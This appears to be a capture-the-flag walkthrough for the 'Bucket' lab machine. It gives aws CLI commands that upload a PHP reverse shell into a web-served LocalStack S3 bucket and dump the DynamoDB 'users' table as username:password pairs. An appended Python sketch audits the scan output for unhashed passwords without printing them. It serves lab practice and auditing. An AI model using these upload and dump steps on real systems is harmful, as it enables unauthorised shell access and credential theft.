AWS LocalStack

LocalStack

Test for non-null credentials

  • Configure creds so that they are not null with
    aws configure
    

Abuse Creds to get shell

  • Use the newly created creds to list the buckets
    aws --endpoint-url http://s3.bucket.htb s3 ls
    
  • Copy the reverse shell from the working directory into the bucket
    aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver/
    

Enumerate dynamodb

  • List tables
    aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
    
  • Dump table
    aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
    
  • Clean table output using jq
    aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[] | "\(.username[]):\(.password[])"'
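
The jq filter above relies on every attribute being a single flat typed value such as {"S": "..."}. As an added example (not part of the original page), this Python sketch deserializes the same `dynamodb scan` JSON, including nested maps and lists, and reports which items hold password-like attributes that are not in a recognisable hash format, without printing the values. The sample data, the attribute-name pattern and the hash-prefix list are assumptions made for the example.

```python
import json
import re

# Constructed sample in the shape `dynamodb scan` prints; all values are made up.
SAMPLE_SCAN = json.dumps({"Items": [
    {"username": {"S": "alice"}, "password": {"S": "Summer2020!"}},
    {"username": {"S": "bob"}, "password": {"S": "$2b$12$" + "a" * 53}},
    {"username": {"S": "carol"}, "profile": {"M": {"api_secret": {"S": "hunter2"}}}},
], "Count": 3, "ScannedCount": 3})

# Assumed heuristics: attribute names worth flagging, and hash-format prefixes.
SENSITIVE = re.compile(r"pass|secret|token", re.I)
HASHED = re.compile(r"^(\$2[aby]\$|\$argon2|\$[156]\$|\$pbkdf2|pbkdf2_)")

def unmarshal(av):
    """Turn one typed attribute value, e.g. {"S": "x"}, into a Python value."""
    (tag, val), = av.items()
    if tag == "N":
        return int(val) if re.fullmatch(r"-?\d+", val) else float(val)
    if tag == "L":
        return [unmarshal(v) for v in val]
    if tag == "M":
        return {k: unmarshal(v) for k, v in val.items()}
    return None if tag == "NULL" else val  # S, B, BOOL, SS/NS/BS pass through

def walk(value, path=""):  # yields (dotted_path, leaf) for every leaf of an item
    if isinstance(value, dict):
        for k, v in value.items():
            yield from walk(v, f"{path}.{k}" if path else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from walk(v, f"{path}[{i}]")
    else:
        yield path, value

def plaintext_findings(scan_json, key_attr="username"):
    """Return (key, attribute_path, value_length) for unhashed secret-like strings."""
    findings = []
    for raw in json.loads(scan_json)["Items"]:
        item = {k: unmarshal(v) for k, v in raw.items()}
        for path, leaf in walk(item):
            name = path.rsplit(".", 1)[-1]
            if isinstance(leaf, str) and SENSITIVE.search(name) and not HASHED.match(leaf):
                findings.append((item.get(key_attr), path, len(leaf)))
    return findings

if __name__ == "__main__":
    print(*plaintext_findings(SAMPLE_SCAN), sep="\n")
```

Only the key, the attribute path and the value length are reported, so the output can go into an audit note without copying the secrets themselves.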